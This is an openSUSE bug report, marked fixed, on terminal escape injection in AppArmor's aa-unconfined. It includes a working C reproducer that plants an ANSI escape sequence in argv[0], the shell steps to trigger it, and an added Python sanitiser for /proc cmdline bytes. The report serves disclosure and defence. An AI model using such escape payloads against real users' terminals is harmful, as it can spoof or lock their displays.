Bug 1219032

Summary: ANSI terminal injection possible in aa-unconfined
Product: [openSUSE] openSUSE Tumbleweed
Reporter: Ricardo Branco <rbranco>
Component: Security
Assignee: Security Team bot <security-team>
Status: RESOLVED FIXED
QA Contact: E-mail List <qa-bugs>
Severity: Normal
Priority: P5 - None
Version: Current
Target Milestone: ---
Hardware: Other
OS: Other
Whiteboard:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Description Ricardo Branco 2024-01-20 17:45:37 UTC
Opened bug upstream: https://gitlab.com/apparmor/apparmor/-/issues/364

The following code displays an X as the title of an ANSI terminal. Without the final '\007' the terminal can be locked up.

The fix is not to trust cmdline in https://gitlab.com/apparmor/apparmor/-/blob/master/utils/aa-unconfined?ref_type=heads#L137 as proc(5) instructs.

$ cat > a.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <err.h>

int main(int argc, char *argv[]) {
	struct sockaddr_in sin;
	int s;

	if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
		err(1, "socket()");

	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = INADDR_ANY;

	if (bind(s, (struct sockaddr*)&sin, sizeof(sin)) < 0)
		err(1, "bind()");

	strcpy(argv[0], "/\033]0;X\007");

	while (1)
		sleep(3600);
}
EOF

$ unset PROMPT_COMMAND

$ cc a.c

$ ./a.out &

$ sudo aa-unconfined

Comment 1 Ricardo Branco 2024-03-25 17:30:54 UTC
Fixed upstream in https://gitlab.com/apparmor/apparmor/-/merge_requests/1142 and fix present in Tumbleweed.
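
One way to neutralize process-controlled /proc/<pid>/cmdline bytes before a tool prints them, as an added example (not the upstream AppArmor fix and not code from this report). The function names are hypothetical, and the sample input is constructed from the argv[0] string in the reproducer above.

```python
import unicodedata


def sanitize_cmdline(raw: bytes) -> str:
    """Render raw /proc/<pid>/cmdline bytes as one line that is safe to print."""
    # Arguments are NUL-separated. The owning process can overwrite this
    # memory at will, so every byte is untrusted input.
    args = raw.rstrip(b"\0").split(b"\0")
    # surrogateescape keeps undecodable bytes as U+DC80..U+DCFF so they can
    # be shown as \xNN below instead of raising or being silently dropped.
    text = " ".join(a.decode("utf-8", errors="surrogateescape") for a in args)
    out = []
    for ch in text:
        cp = ord(ch)
        if 0xDC80 <= cp <= 0xDCFF:
            # Raw byte that was not valid UTF-8 (for example a bare 0x9b CSI).
            out.append(f"\\x{cp - 0xDC00:02x}")
        elif unicodedata.category(ch).startswith("C"):
            # Control and format characters: ESC, BEL, newline, C1 controls,
            # bidi overrides. Show them as visible escapes.
            out.append(f"\\x{cp:02x}" if cp < 0x100 else f"\\u{cp:04x}")
        else:
            out.append(ch)
    return "".join(out)


def read_cmdline(pid: int) -> str:
    """Read and sanitize the command line of a process (Linux procfs)."""
    with open(f"/proc/{pid}/cmdline", "rb") as fh:
        return sanitize_cmdline(fh.read())


if __name__ == "__main__":
    # Constructed sample: what /proc/<pid>/cmdline holds after the reproducer
    # overwrites argv[0] with "/\033]0;X\007".
    sample = b"/\x1b]0;X\x07\0"
    print(sanitize_cmdline(sample))
```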